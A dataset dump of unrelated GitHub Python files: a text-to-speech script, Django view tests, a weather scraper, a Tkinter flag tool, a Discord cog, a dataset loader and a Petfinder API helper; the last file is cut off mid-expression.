+{"seq_id":"38401542857","text":"\nimport os\nfrom google.cloud import texttospeech\n# Add your google api authentication credentials\ncredential_path=\"/Users/revanthbn/OneDrive/MentalHealthTracker/My-First-Project-5928deb2c80b.json\"\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] = credential_path\n# Instantiates a client\nclient = texttospeech.TextToSpeechClient()\n\n# Set the text input to be synthesized\nsynthesis_input = texttospeech.SynthesisInput(text=\"I feel like a burden. I feel lonely. I’m not doing very well. I miss my family. \")\n\n# Build the voice request, select the language code (\"en-US\") and the ssml\n# voice gender (\"neutral\")\nvoice = texttospeech.VoiceSelectionParams(\n language_code=\"en-UK\", ssml_gender=texttospeech.SsmlVoiceGender.FEMALE\n)\n\n# Select the type of audio file you want returned\naudio_config = texttospeech.AudioConfig(\n audio_encoding=texttospeech.AudioEncoding.MP3\n)\n\n# Perform the text-to-speech request on the text input with the selected\n# voice parameters and audio file type\nresponse = client.synthesize_speech(\n input=synthesis_input, voice=voice, audio_config=audio_config\n)\n# See if there's a way to integrate the response directly\n# The response's audio_content is binary.\nwith open(\"alexa1.mp3\", \"wb\") as out:\n # Write the response to the output file.\n out.write(response.audio_content)\n print('Audio content written to file \"output.mp3\"')\n","repo_name":"rehanayub10/MedHacks2020","sub_path":"text_to_speech.py","file_name":"text_to_speech.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3973034547","text":"import shutil\nimport tempfile\n\nfrom django import forms\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.core.cache import cache\nfrom django.core.files.uploadedfile import SimpleUploadedFile\nfrom django.test import Client, TestCase, override_settings\nfrom django.urls import reverse\n\nfrom yatube.settings import POST_PER_PAGE\n\nfrom ..forms import CommentForm\nfrom ..models import Comment, Follow, Group, Post\n\nUser = get_user_model()\nPOSTS = 13\nSECOND_PAGE_POSTS = 3\nTEMP_MEDIA_ROOT = tempfile.mkdtemp(dir=settings.BASE_DIR)\n\n\n@override_settings(MEDIA_ROOT=TEMP_MEDIA_ROOT)\nclass ViewsTests(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.user = User.objects.create_user(username='NoNameAuthor')\n cls.user_follower = User.objects.create_user(username='Follower')\n cls.user_following = User.objects.create_user(username='Following')\n cls.group = Group.objects.create(\n title='Тестовая группа',\n slug='test_slug',\n description='Тестовое описание'\n )\n cls.index = reverse('posts:index')\n cls.group_list = reverse('posts:group_posts', kwargs={\n 'slug': 'test_slug'\n })\n cls.profile = reverse('posts:profile', kwargs={\n 'username': 'NoNameAuthor'\n })\n cls.post_detail = reverse('posts:post_detail', kwargs={'post_id': '1'})\n cls.post_create = reverse('posts:post_create')\n cls.post_edit = reverse('posts:post_edit', kwargs={'post_id': '1'})\n cls.follow_index = reverse('posts:follow_index')\n cls.small_gif = (\n b'\\x47\\x49\\x46\\x38\\x39\\x61\\x02\\x00'\n b'\\x01\\x00\\x80\\x00\\x00\\x00\\x00\\x00'\n b'\\xFF\\xFF\\xFF\\x21\\xF9\\x04\\x00\\x00'\n b'\\x00\\x00\\x00\\x2C\\x00\\x00\\x00\\x00'\n b'\\x02\\x00\\x01\\x00\\x00\\x02\\x02\\x0C'\n b'\\x0A\\x00\\x3B'\n )\n cls.uploaded = SimpleUploadedFile(\n name='small.gif',\n content=cls.small_gif,\n content_type='image/gif',\n )\n cls.post = Post.objects.create(\n author=cls.user,\n text='Тестовый пост',\n group=cls.group,\n image=cls.uploaded,\n )\n cls.post_to_follow = Post.objects.create(\n author=cls.user_following,\n text='Пост для проверки подписок',\n )\n cls.true_group = Group.objects.create(\n title='Тестовая группа2',\n slug='test_slug2',\n description='Тестовое описание2',\n )\n cls.follow = Follow.objects.create(\n user=cls.user,\n author=cls.post.author\n )\n cls.comment = Comment.objects.create(\n post=cls.post,\n author=cls.user,\n text='Комментарий'\n )\n\n @classmethod\n def tearDownClass(cls):\n super().tearDownClass()\n shutil.rmtree(TEMP_MEDIA_ROOT, ignore_errors=True)\n\n def setUp(self):\n self.guest_client = Client()\n self.authorized_client = Client()\n self.authorized_client.force_login(self.user)\n self.user_follower_client = Client()\n self.user_follower_client.force_login(self.user_follower)\n self.user_following_client = Client()\n self.user_following_client.force_login(self.user_following)\n cache.clear()\n\n def test_index_correct_context(self):\n \"\"\"Проверить контекст шаблона index.\"\"\"\n response = self.authorized_client.get(self.index)\n self.assertEqual(response.context['post'], self.post)\n\n def test_group_posts_correct_context(self):\n \"\"\"Проверить контекст шаблона group_posts.\"\"\"\n response = self.authorized_client.get(self.group_list)\n self.assertEqual(response.context['post'], self.post)\n self.assertEqual(response.context['group'], self.group)\n\n def test_profile_correct_context(self):\n \"\"\"Проверить контекст шаблона profile.\"\"\"\n response = self.authorized_client.get(self.profile)\n self.assertEqual(response.context['post'], self.post)\n self.assertEqual(response.context['author'], self.user)\n self.assertTrue(response.context['following'], self.follow)\n\n def test_post_detail_correct_context(self):\n \"\"\"Проверить контекст шаблона post_detail.\"\"\"\n response = self.authorized_client.get(self.post_detail)\n self.assertEqual(response.context['post'], self.post)\n self.assertTrue(response.context['comments'], self.comment)\n self.assertTrue(response.context['form'], CommentForm())\n\n def test_follow_index_correct_context(self):\n \"\"\"Проверить контекст шаблона follow_index.\"\"\"\n response = self.authorized_client.get(self.follow_index)\n self.assertEqual(response.context['post'], self.post)\n\n def test_post_edit_correct_context(self):\n \"\"\"Проверить контекст шаблона post_edit.\"\"\"\n form_fields = [\n (\n 'text',\n forms.fields.CharField,\n self.authorized_client.get(self.post_edit)\n ),\n (\n 'group',\n forms.fields.ChoiceField,\n self.authorized_client.get(self.post_edit)\n ),\n (\n 'image',\n forms.fields.ImageField,\n self.authorized_client.get(self.post_edit)\n ),\n (\n 'text',\n forms.fields.CharField,\n self.authorized_client.get(self.post_create)\n ),\n (\n 'group',\n forms.fields.ChoiceField,\n self.authorized_client.get(self.post_create)\n ),\n (\n 'image',\n forms.fields.ImageField,\n self.authorized_client.get(self.post_create)\n )\n ]\n for value, expected, response in form_fields:\n with self.subTest(value=value):\n form_field = response.context.get('form').fields.get(value)\n self.assertIsInstance(form_field, expected)\n\n def test_post_in_true_group(self):\n \"\"\"\n Проверить правильность группы у поста.\n \"\"\"\n response = self.authorized_client.get(\n reverse('posts:group_posts',\n args=[self.true_group.slug]))\n self.assertNotIn(self.post, response.context['page_obj'])\n\n def test_add_posts_comment(self):\n \"\"\"\n Проверить добавление комментария.\n \"\"\"\n comment_count = Comment.objects.count()\n new_comment = {\n 'text': 'text-test'\n }\n self.authorized_client.post(\n reverse('posts:add_comment', args=[self.post.id]),\n data=new_comment,\n follow=True,\n )\n self.assertEqual(Comment.objects.count(), comment_count + 1)\n self.assertTrue(\n Comment.objects.filter(\n text='Комментарий',\n author=self.user,\n ).exists()\n )\n\n def test_guest_client_cant_comment(self):\n \"\"\"\n Не авторизованный пользователь не может комментировать.\n \"\"\"\n comment_count = Comment.objects.count()\n new_comment = {\n 'text': 'text-test'\n }\n response = self.guest_client.post(\n reverse('posts:add_comment', args=[self.post.id]),\n data=new_comment,\n follow=True,\n )\n self.assertEqual(Comment.objects.count(), comment_count)\n self.assertRedirects(\n response,\n f'/auth/login/?next=/posts/{self.post.id}/comment/'\n )\n\n def test_cache_index(self):\n \"\"\"Проверить кэш главной страницы.\"\"\"\n post_1 = Post.objects.create(\n author=self.user,\n text='Тестовый пост_1',\n group=self.group\n )\n response_1 = self.authorized_client.get(self.index)\n Post.objects.filter(pk=post_1.id).delete()\n response_2 = self.authorized_client.get(self.index)\n self.assertEqual(response_1.content, response_2.content)\n cache.clear()\n response_3 = self.authorized_client.get(self.index)\n self.assertNotEqual(response_2.content, response_3.content)\n\n def test_follow(self):\n \"\"\"Проверить подписку на автора.\"\"\"\n Follow.objects.create(\n user=self.user_follower,\n author=self.user_following\n )\n response = self.user_follower_client.get(self.follow_index)\n self.assertEqual(\n response.context['page_obj'][0].text,\n self.post_to_follow.text\n )\n response_2 = self.user_following_client.get(self.follow_index)\n self.assertNotEqual(response_2, self.post_to_follow.text)\n\n def test_unfollow(self):\n \"\"\"Проверить отмену подписки на автора.\"\"\"\n Follow.objects.create(\n user=self.user_follower,\n author=self.user_following\n )\n response = self.user_follower_client.get(\n reverse(\n 'posts:profile_unfollow',\n kwargs={'username': self.user_following}\n )\n )\n follow = None\n self.assertEqual(response.context, follow)\n\n def test_new_post_in_follow_user(self):\n \"\"\"\n Проверить новые посты пользователей у подписчиков.\n \"\"\"\n Follow.objects.create(\n user=self.user_follower,\n author=self.user_following\n )\n response = self.user_follower_client.get(self.follow_index)\n self.assertEqual(\n response.context['page_obj'][0].text,\n self.post_to_follow.text\n )\n\n def test_new_post_in_ufollow_user(self):\n \"\"\"\n Проверить новые посты пользователей у не подписчиков.\n \"\"\"\n Follow.objects.create(\n user=self.user_follower,\n author=self.user_following\n )\n response = self.user_following_client.get(self.follow_index)\n self.assertNotEqual(\n response.context,\n self.post_to_follow\n )\n\n\nclass PaginatorViewsTest(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.authorized_author = Client()\n cls.author = User.objects.create_user(username='NoName')\n cls.group = Group.objects.create(\n title='test_title',\n description='test_description',\n slug='test-slug'\n )\n cache.clear()\n\n def setUp(self):\n for post_temp in range(POSTS):\n Post.objects.create(\n text=f'text{post_temp}', author=self.author, group=self.group\n )\n\n def test_first_page_contains_ten_records(self):\n templates_pages_names = {\n 'posts/index.html': reverse('posts:index'),\n 'posts/group_posts.html':\n reverse('posts:group_posts', kwargs={'slug': self.group.slug}),\n 'posts/profile.html':\n reverse('posts:profile', kwargs={'username': self.author}),\n }\n for template, reverse_name in templates_pages_names.items():\n with self.subTest(reverse_name=reverse_name):\n response = self.client.get(reverse_name)\n self.assertEqual(\n len(response.context['page_obj']), POST_PER_PAGE\n )\n\n def test_second_page_contains_three_records(self):\n templates_pages_names = {\n 'posts/index.html': reverse('posts:index') + '?page=2',\n 'posts/group_posts.html':\n reverse('posts:group_posts',\n kwargs={'slug': self.group.slug}) + '?page=2',\n 'posts/profile.html':\n reverse('posts:profile',\n kwargs={'username': self.author}) + '?page=2',\n }\n for template, reverse_name in templates_pages_names.items():\n with self.subTest(reverse_name=reverse_name):\n response = self.client.get(reverse_name)\n self.assertEqual(len(\n response.context['page_obj']), SECOND_PAGE_POSTS\n )\n","repo_name":"kirillkutsko/hw05_final","sub_path":"yatube/posts/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":12700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15059242776","text":"import pandas as pd\nimport numpy as np \nimport datetime\nimport urllib, json\nfrom bs4 import BeautifulSoup\n# UDF \nfrom script.utility_data_IO import * \n#from script.utility_operation import * \n#import utility_data_IO\n\ncols = ['Mean Temperature', 'Max Temperature', 'Min Temperature',\n 'Heating Degree Days', 'Dew Point', 'Average Humidity',\n 'Maximum Humidity', 'Minimum Humidity', 'Precipitation',\n 'Sea Level Pressure', 'Wind Speed', 'Max Wind Speed', 'Max Gust Speed',\n 'Visibility', 'Events', 'timestamp']\n\ndef col_fix(df):\n for col in cols:\n if col in df.columns:\n pass\n else:\n df[col] = None \n return df \n\ndef main_(start_date,end_date):\n output=pd.DataFrame([])\n # -------------\n print ('-----------------')\n print ('start_date : ',start_date )\n print ('end_date : ',end_date )\n print ('-----------------')\n for day in pd.date_range(start=start_date, end=end_date, freq='D'):\n #for day in pd.date_range(start_date='3/1/2017', end_date='3/5/2017', freq='D'):\n print ((day))\n date_ = str(day).split(' ')[0] \n year_ = date_.split('-')[0]\n month_ = date_.split('-')[1]\n day_ = date_.split('-')[2]\n # -------------\n url_new = 'https://www.wunderground.com/history/airport/EGMC/{}/{}/{}/DailyHistory.html?cm_ven=localwx_history'.format(year_,month_,day_)\n print (url_new)\n \n # query the page \n opener=urllib.request.build_opener()\n opener.addheaders = [('User-agent', 'Mozilla/5.0')]\n page = opener.open(url_new)\n soup = BeautifulSoup(page)\n trs = soup.find_all('td', attrs={'class': 'indent'})\n col=[]\n val=[]\n for tr in trs:\n if tr.text in cols:\n tds = tr.find_next_siblings(\"td\") # you get list\n print (tr.text )\n col.append(tr.text)\n print (tds[0].text)\n val.append(tds[0].text.strip('\\n')\n .replace('\\xa0','')\n .replace('°C','')\n .replace('mm','')\n .replace('hPa','')\n .replace('km/h\\n ()','')\n .replace('km/h','')\n .replace('kilometers','')\n .replace('\\n\\t', '')\n .replace('\\t', '')\n .replace('\\n', '')\n .replace('- ()', ''))\n #.replace(' -', ''))\n else:\n col.append(tr.text) \n val.append(None) \n\n df = pd.DataFrame({'col':col,'val':val}).set_index('col').T.reset_index()\n df['timestamp'] = day \n del df['index']\n df = col_fix(df)\n print ('df.columns : ' , df.columns )\n print ('cols : ' , cols )\n #df.columns = cols \n df = df[cols] \n ### update output dataframe \n output = output.append(df)\n output = output.reset_index()\n print (output)\n del output['index']\n # fix column name \n output.columns = ['mean_temperature','max_temperature', 'min_temperature',\n 'heating_degree_days', 'dew_point', 'avg_humidity',\n 'max_humidity', 'min_humidity', 'precipitation',\n 'sea_level_pressure', 'wind_speed', 'max_wind_speed', 'max_gust_speed',\n 'visibility', 'events', 'timestamp']\n # re-order columns \n output = output[['timestamp','mean_temperature','max_temperature', 'min_temperature',\n 'heating_degree_days', 'dew_point', 'avg_humidity','max_humidity', 'min_humidity', 'precipitation',\n 'sea_level_pressure', 'wind_speed', 'max_wind_speed', 'max_gust_speed',\n 'visibility','events']]\n # clean data \n output=output.replace(' -', np.nan)\n print (output)\n return output \n\nif __name__ == '__main__':\n df_ = main_('1/1/2016', '12/31/2017')\n # dump to DB \n write_data_to_db(df_, 'weather_ldn',db_url)\n","repo_name":"yennanliu/web_scraping","sub_path":"legacy_project/weather_scrapper/LDN_weather_scrapper_V1.py","file_name":"LDN_weather_scrapper_V1.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"15173825909","text":"import Tkinter\r\nimport os\r\n\r\ntk = Tkinter.Tk()\r\ntk.title(\"flags\")\r\ntk.geometry(\"300x100\")\r\ntk.resizable(False, False)\r\n\r\nd = {}\r\nwith open(\"flags.txt\") as f:\r\n for line in f:\r\n if len(line) is not 1:\r\n try:\r\n (key, val) = line.split(',')\r\n d[key] = val.rstrip()\r\n except:\r\n print(\"Warning: Max of two columns, lines removed\")\r\n\r\ndef dropdown(active_value):\r\n global active\r\n active = d[active_value]\r\n button_drop[\"state\"] = \"normal\"\r\n button_del[\"state\"] = \"normal\"\r\n button_drop.config(text = \"Drop {} flag\".format(active))\r\n button_del.config(text = \"Delete {} flag\".format(active))\r\n\r\n\r\ndef dropflag():\r\n try:\r\n open(active, 'a').close()\r\n except NameError:\r\n print(\"Select an option\")\r\n\r\ndef delflag():\r\n try:\r\n os.remove(active)\r\n except NameError:\r\n print(\"Select an option\")\r\n except WindowsError:\r\n print(\"File not found\")\r\n \r\nvar = Tkinter.StringVar()\r\nvar.set('Version')\r\n\r\np = Tkinter.OptionMenu(tk, var, *d, command=dropdown)\r\np.pack()\r\nbutton_drop = Tkinter.Button(command=dropflag)\r\nbutton_del= Tkinter.Button(command=delflag)\r\nbutton_drop[\"state\"] = \"disabled\"\r\nbutton_del[\"state\"] = \"disabled\"\r\nbutton_drop.pack()\r\nbutton_del.pack()\r\n\r\ntk.mainloop()","repo_name":"charlesmclement/flags","sub_path":"flags.py","file_name":"flags.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10303397991","text":"from io import BytesIO\nfrom math import floor\nfrom typing import Optional\n\nimport discord\nfrom PIL import Image\nfrom redbot.core import commands\n\nWIDE_HEIGHT = 48\n\n\nclass CrowWide(commands.Cog):\n @commands.command()\n async def wide(\n self,\n ctx: commands.Context,\n emoji: discord.PartialEmoji,\n size: float = 3.0,\n channel: Optional[discord.TextChannel] = None,\n ):\n \"\"\"owo\"\"\"\n\n if size < 0.05 or size > 20:\n await ctx.react_quietly(\"🚷\")\n return\n\n if size >= 1.0:\n width = floor(WIDE_HEIGHT * size)\n height = WIDE_HEIGHT\n else:\n # 🐇🥚🤫\n width = WIDE_HEIGHT\n height = floor(WIDE_HEIGHT / size)\n\n emoji_data = BytesIO(await emoji.read())\n resized_file = self._resize_image(emoji_data, width, height)\n file = discord.File(resized_file, filename=f\"{emoji.name}_wide.png\")\n\n if channel:\n await channel.send(file=file)\n else:\n await ctx.send(file=file)\n\n def _resize_image(self, image_data: BytesIO, width: int, height: int):\n out = BytesIO()\n with Image.open(image_data) as img:\n resized = img.resize((width, height))\n resized.save(out, format=\"PNG\")\n out.seek(0)\n return out\n","repo_name":"MtKanjon/kenku","sub_path":"cogs/crow/crow_wide.py","file_name":"crow_wide.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"12849472268","text":"import json\nimport client as cl\nimport os\n\n#----------------------------------------Tester Default Definitions-------------------------------\nTEST_CONFIG = \"TEST_CONFIG.json\"\nITERATION = 100\n#-------------------------------------------------------------------------------------------------\n\n# default test config\ndef defaultTest():\n TestConfig = {\n \"IMAGE\":{\n \"host\":\"localhost\",\n \"port\":\"1337\",\n \"file\":\"pic.jpg\"\n },\n \"TEXT\":{\n \"host\":\"localhost\",\n \"port\":\"1337\",\n \"file\":\"test.txt\",\n }\n }\n return TestConfig\n\n# tester runs client for n interations with given config\ndef tester(config):\n # running interation of client to check for errors\n host = config[\"host\"]\n port = int(config[\"port\"])\n filename = config[\"file\"]\n if \"iteration\" in config:\n iteration = int(config[\"iteration\"])\n else:\n iteration = ITERATION\n \n for i in range(iteration):\n try:\n cl.client(host, port, filename)\n \n except Exception as error_message:\n log.write(f\"- Iteration: {i} - ERROR: {error_message}\\n\")\n\nif __name__ == \"__main__\":\n if os.path.isfile(TEST_CONFIG):\n with open(TEST_CONFIG, \"r\") as configFile:\n allConfig = json.load(configFile)\n else:\n # creates test config from default tests\n allConfig = defaultTest()\n with open(TEST_CONFIG, \"w\") as configFile:\n json.dump(allConfig, configFile, indent = 4)\n\n for config in allConfig:\n logfile = f\"TEST_LOG_{config}.txt\"\n with open(logfile, \"a\") as log:\n tester(allConfig[config])","repo_name":"ismailfaruk/ECSE416--Telecommunication-Networks","sub_path":"LAB_1/tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6202627493","text":"# -*- coding: utf-8 -*-\n\nfrom celery.bin import worker\n\nfrom app import create_app, celery\n\napp = create_app()\napp.app_context().push()\n\n\nif __name__ == '__main__':\n\n with app.app_context():\n worker = worker.worker(app=celery)\n\n worker.run(loglevel=\"info\", queues=[\"anti_q\", ])\n","repo_name":"leolinf/flask-demo","sub_path":"risk/celery_app.py","file_name":"celery_app.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38705816829","text":"import os\nimport glob\nimport cc3d\n\nfrom skimage import io, transform\nfrom torch.utils.data import Dataset\nfrom copy import copy\n\nfrom graphics import Voxelgrid\n\nfrom scipy.ndimage.morphology import binary_dilation\n\nfrom utils.data import *\n\nfrom dataset.binvox_utils import read_as_3d_array\n\n\nclass ModelNet(Dataset):\n\n def __init__(self, config):\n\n self.root_dir = os.path.expanduser(config.root_dir)\n\n self.resolution = (config.resy, config.resx)\n self.xscale = self.resolution[0] / 480.\n self.yscale = self.resolution[1] / 640.\n\n self.transform = config.transform\n\n self.scene_list = config.scene_list\n\n self.noise_scale = config.noise_scale\n self.outlier_scale = config.outlier_scale\n self.outlier_fraction = config.outlier_fraction\n\n self.grid_resolution = config.grid_resolution\n\n self.split = 'test'\n\n self._load_frames()\n\n def _load_frames(self):\n\n self._scenes = []\n self.frames = []\n\n with open(self.scene_list, 'r') as file:\n\n for line in file:\n try:\n scene, obj = line.rstrip().split('\\t')\n except:\n scene, obj = line.rstrip().split(' ')\n\n self._scenes.append(os.path.join(scene, obj))\n\n path = os.path.join(self.root_dir, scene, self.split, obj,\n 'data', '*.depth.png')\n files = glob.glob(path)\n for i, f in enumerate(files):\n self.frames.append(f.replace('.depth.png', ''))\n\n def __len__(self):\n return len(self.frames)\n\n def __getitem__(self, item):\n frame = self.frames[item]\n\n pathsplit = frame.split('/')\n sc = pathsplit[-5]\n obj = pathsplit[-3]\n scene_id = '{}/{}'.format(sc, obj)\n sample = {}\n\n frame_id = frame.split('/')[-1]\n frame_id = int(frame_id)\n sample['frame_id'] = frame_id\n\n depth = io.imread('{}.depth.png'.format(frame))\n depth = depth.astype(np.float32)\n depth = depth / 1000.\n # depth[depth == np.max(depth)] = 0.\n\n step_x = depth.shape[0] / self.resolution[0]\n step_y = depth.shape[1] / self.resolution[1]\n\n index_y = [int(step_y * i) for i in\n range(0, int(depth.shape[1] / step_y))]\n index_x = [int(step_x * i) for i in\n range(0, int(depth.shape[0] / step_x))]\n\n depth = depth[:, index_y]\n depth = depth[index_x, :]\n\n mask = copy(depth)\n mask[mask == np.max(depth)] = 0\n mask[mask != 0] = 1\n original_mask = copy(mask)\n sample['original_mask'] = copy(mask)\n gradient_mask = binary_dilation(mask, iterations=5)\n mask = binary_dilation(mask, iterations=8)\n sample['mask'] = mask\n sample['gradient_mask'] = gradient_mask\n\n depth[mask == 0] = 0\n\n sample['depth'] = depth\n sample['noisy_depth'] = add_kinect_noise(copy(depth),\n sigma_fraction=self.noise_scale)\n sample['noisy_depth_octnetfusion'] = add_depth_noise(copy(depth),\n noise_sigma=self.noise_scale,\n seed=42)\n sample['outlier_depth'] = add_outliers(\n copy(sample['noisy_depth_octnetfusion']),\n scale=self.outlier_scale,\n fraction=self.outlier_fraction)\n\n #sample['sparse_depth'] = add_sparse_depth(copy(depth), percentage=0.01)\n sample['outlier_blob_depth'] = add_outlier_blobs(copy(sample['noisy_depth_octnetfusion']),\n scale=self.outlier_scale,\n fraction=self.outlier_fraction)\n\n intrinsics = np.loadtxt('{}.intrinsics.txt'.format(frame))\n # adapt intrinsics to camera resolution\n scaling = np.eye(3)\n scaling[1, 1] = self.yscale\n scaling[0, 0] = self.xscale\n\n sample['intrinsics'] = np.dot(scaling, intrinsics)\n\n extrinsics = np.loadtxt('{}.extrinsics.txt'.format(frame))\n extrinsics = np.linalg.inv(extrinsics)\n sample['extrinsics'] = extrinsics\n\n sample['scene_id'] = scene_id\n\n for key in sample.keys():\n if type(sample[key]) is not np.ndarray and type(\n sample[key]) is not str:\n sample[key] = np.asarray(sample[key])\n\n if self.transform:\n sample = self.transform(sample)\n\n return sample\n @property\n def scenes(self):\n return self._scenes\n\n def get_grid(self, scene):\n\n sc, obj = scene.split('/')\n if self.grid_resolution == 256:\n filepath = os.path.join(self.root_dir, sc, self.split, obj,\n 'voxels', '*.binvox')\n else:\n filepath = os.path.join(self.root_dir, sc, self.split, obj,\n 'voxels', '*.{}.binvox'.format(\n self.grid_resolution))\n\n filepath = glob.glob(filepath)[0]\n\n # filepath = os.path.join(self.root_dir, 'example', 'voxels', 'chair_0256.binvox')\n\n with open(filepath, 'rb') as file:\n volume = read_as_3d_array(file)\n\n array = volume.data.astype(np.int)\n\n # clean occupancy grids from artifacts\n labels_out = cc3d.connected_components(array) # 26-connected\n N = np.max(labels_out)\n max_label = 0\n max_label_count = 0\n for segid in range(1, N + 1):\n extracted_image = labels_out * (labels_out == segid)\n extracted_image[extracted_image != 0] = 1\n label_count = np.sum(extracted_image)\n if label_count > max_label_count:\n max_label = segid\n max_label_count = label_count\n array[labels_out != max_label] = 0.\n\n resolution = 1. / self.grid_resolution\n\n grid = Voxelgrid(resolution)\n bbox = np.zeros((3, 2))\n bbox[:, 0] = volume.translate\n bbox[:, 1] = bbox[:, 0] + resolution * volume.dims[0]\n\n grid.from_array(array, bbox)\n\n return grid\n","repo_name":"weders/RoutedFusion","sub_path":"dataset/modelnet.py","file_name":"modelnet.py","file_ext":"py","file_size_in_byte":6269,"program_lang":"python","lang":"en","doc_type":"code","stars":129,"dataset":"github-code","pt":"53"} +{"seq_id":"72290809128","text":"import requests\nimport os\nfrom flask import request\nimport json\n\n\nAPI_KEY = os.environ['PETFINDER_KEY']\nSECRET_KEY = os.environ['PETFINDER_SECRET']\n\ndef get_token():\n \"\"\"Returns authorization token from petfinder\"\"\"\n \n url = \"https://api.petfinder.com/v2/oauth2/token\"\n data = {'grant_type': 'client_credentials',\n 'client_id': API_KEY,\n 'client_secret': SECRET_KEY}\n response = requests.post(url, data=data)\n res = response.json()\n token = res['token_type'] + ' ' + res['access_token']\n\n return token\n\n\ndef get_breeds():\n \"\"\"returns possible cat breed parameters\"\"\"\n \n token = get_token()\n atype = 'cat'\n url = 'https://api.petfinder.com/v2/types/'+ atype +'/breeds'\n headers = {'Authorization': token}\n payload = {'type': atype}\n response = requests.get(url, headers=headers, params=payload)\n data = response.json()\n breeds = {}\n breeds['breeds'] = []\n for breed in data['breeds']:\n breeds['breeds'].append(breed['name'])\n\n return breeds\n\n\ndef get_colors():\n \"\"\"returns possible coat colors\"\"\"\n\n token = get_token()\n url = 'https://api.petfinder.com/v2/types'\n headers = {'Authorization': token}\n response = requests.get(url, headers=headers)\n data = response.json()\n colors = {}\n for color in data['types']:\n if color['name'] == 'Cat':\n colors['colors'] = color['colors']\n\n return colors\n\n\ndef search_petfinder():\n \"\"\"Return API response based on user search input, get animals endpoint\"\"\"\n \n token = get_token()\n url = 'https://api.petfinder.com/v2/animals'\n headers = {'Authorization': token}\n location_search = request.form.get('search')\n miles = int(request.form.get('miles', '100'))\n size = request.form.get('thickness', '')\n color = request.form.get('color', '')\n breed = request.form.get('breed', '')\n coat = request.form.get('coat', '')\n gender = request.form.get('gender', '')\n\n if color == 'Color':\n color = ''\n if breed == 'Breed': \n breed = ''\n if coat == 'Coat Length': \n coat = ''\n if gender == 'Gender': \n gender = ''\n\n payload = {'type': 'Cat',\n 'limit': 25, \n 'location': location_search,\n 'color': color,\n 'distance': miles,\n 'breed': breed,\n 'coat': coat,\n 'gender': gender,\n 'size': size}\n print('COLOR2', color)\n response = requests.get(url, headers=headers, params=payload)\n data = response.json() \n \n return data\n\n\ndef search_data_map():\n \"\"\"Mapping function to extract relevant information from search_petfinder\"\"\"\n \n fatty_dict = {}\n cats = search_petfinder()\n for cat in cats['animals']:\n if cat['photos'] != []:\n fatty_dict[cat['id']] = {\n 'cat_id': cat['id'],\n 'name': cat['name'], \n 'gender': cat['gender'],\n 'breed': cat['breeds']['primary'],\n 'shelter_id': cat['organization_id'], \n 'photo_url': {'medium': cat['photos'][0]['medium'], \n 'large': cat['photos'][0]['large']},\n 'coat_len': cat['coat'],\n 'color': cat['colors']['primary'],\n 'extra_love': cat['attributes']['special_needs'],\n 'environment': {'kids': cat['environment']['children'],\n 'dogs': cat['environment']['dogs'],\n 'cats': cat['environment']['cats']}\n }\n\n return fatty_dict\n\n\ndef fake_cat_data_map():\n \"\"\"Fake cat data with dynamic filtering\"\"\"\n\n location_search = request.form.get('search')\n miles = int(request.form.get('miles', '100'))\n size = request.form.get('thickness', 'large,xlarge')\n color = request.form.get('color', 'Color')\n breed = request.form.get('breed', 'Breed')\n coat = request.form.get('coat', 'Coat Length')\n gender = request.form.get('gender', 'Gender')\n\n fatty_dict = {}\n fatty_filter = {}\n chonk_filter = {}\n for cat in open('fakeChonksForFun.txt'):\n cat = cat.rstrip()\n cat = cat.split('|')\n fatty_dict[cat[0]] = {'cat_id': cat[0],\n 'name': cat[1],\n 'gender': cat[2],\n 'breed': cat[3],\n 'shelter_id': cat[4],\n 'photo_url': {'medium': cat[5],\n 'large': ''},\n 'coat_len': cat[6],\n 'color': cat[7],\n 'extra_love': cat[8],\n 'environment': {'kids': cat[9],\n 'dogs': cat[10],\n 'cats': cat[11]},\n 'size': cat[12]}\n\n if ((breed == 'Breed' and color == 'Color' and coat == 'Coat Length' and \n gender == 'Gender' and size == 'large,xlarge') or (not breed and not color \n and not coat and not gender and size)):\n return fatty_dict\n\n else:\n b = breed == 'Breed'\n cl = color == 'Color'\n g = gender == 'Gender'\n ct = coat == 'Coat Length'\n s = size == 'large,xlarge'\n for c_id, info in fatty_dict.items():\n col = info['color'] == color\n bre = info['breed'] == breed\n cot = info['coat_len'] == coat\n gen = info['gender'] == gender\n si = info['size'] == size\n if ((col and bre and cot and gen and si) or\n (b and col and cot and gen and si) or (cl and bre and cot and gen and si) or \n (ct and col and bre and gen and si) or (g and col and cot and bre and si) or\n (s and col and cot and bre and gen) or (b and cl and cot and g and s) or \n (b and col and ct and g and s) or (bre and cl and ct and g and s) or\n (b and cl and ct and g and si) or (b and cl and ct and gen and s) or\n (b and cl and cot and gen and si) or (b and col and ct and gen and si) or\n (b and col and cot and g and si) or (cl and b and cot and gen and si) or\n (cl and bre and ct and gen and si) or (cl and bre and cot and g and si) or \n (ct and b and col and gen and si) or (ct and bre and cl and gen and si) or\n (ct and bre and col and g and si) or (g and b and col and cot and si) or\n (g and bre and cl and cot and si) or (g and bre and col and ct and si) or \n (s and b and col and cot and si and gen) or (s and bre and cl and cot and si and gen) or\n (s and bre and col and ct and si and gen) or (b and cl and ct and gen and si) or\n (b and cl and cot and g and si) or (b and col and ct and g and si) or\n (b and col and cot and g and s) or (cl and b and ct and gen and si) or\n (cl and b and cot and g and si) or (cl and bre and ct and g and si) or\n (cl and bre and cot and g and s) or (ct and b 